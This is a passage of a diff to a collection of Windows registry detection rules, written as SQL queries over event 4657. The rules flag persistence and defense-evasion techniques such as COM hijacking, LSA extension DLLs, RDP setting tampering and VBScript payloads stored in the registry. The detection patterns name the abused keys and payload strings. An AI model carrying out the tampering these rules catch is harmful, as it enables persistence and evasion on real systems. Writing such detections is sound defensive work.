Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" }, { - "title": "Potential Persistence Via COM Search Order Hijacking", - "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", "status": "experimental", - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1547.001" ], "falsepositives": [ - "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (NewValue LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewValue LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_search_order.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Potential Persistence Via Custom Protocol Handler", - "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", - "status": "experimental", - "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WinSock2 Autorun Keys Modification", + "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate applications registering a new custom protocol handler" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND NewValue LIKE 'URL:%' ESCAPE '\\') AND NOT ((NewValue LIKE 'URL:ms-%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_custom_protocol_handler.yml" + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering", - "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (NewValue LIKE '%Bypass%' ESCAPE '\\' OR NewValue LIKE '%RemoteSigned%' ESCAPE '\\' OR NewValue LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_powershell_execution_policy.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "Enable Microsoft Dynamic Data Exchange", + "id": "63647769-326d-4dde-a419-b925cc0caf42", + "status": "test", + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.execution", + "attack.t1559.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_set_office_enable_dde.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "RDP Sensitive Settings Changed to Zero", + "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.persistence", - "attack.execution", "attack.defense_evasion", + "attack.persistence", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" + "filename": "registry_set_terminal_server_suspicious.yml" }, { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "title": "Winget Admin Settings Modification", + "id": "6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "description": "Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence" ], "falsepositives": [ - "Unlikely" + "The event doesn't contain information about the type of change. False positives are expected with legitimate changes" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' AND TargetObject LIKE '\\\\REGISTRY\\\\A\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LocalState\\\\admin\\_settings' ESCAPE '\\')" ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_set_winget_admin_settings_tampering.yml" }, { - "title": "Suspicious Keyboard Layout Load", - "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "status": "test", - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion" ], "falsepositives": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (NewValue LIKE '%00000429%' ESCAPE '\\' OR NewValue LIKE '%00050429%' ESCAPE '\\' OR NewValue LIKE '%0000042a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_susp_keyboard_layout_load.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "Classes Autorun Keys Modification", - "id": "9df5f547-c86a-433e-b533-f2794357e242", + "title": "Potential PendingFileRenameOperations Tamper", + "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Installers and updaters may set currently in use files for rename after a reboot." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewValue = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml" + "filename": "registry_set_susp_pendingfilerenameoperations.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "Registry Hide Function from User", + "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE 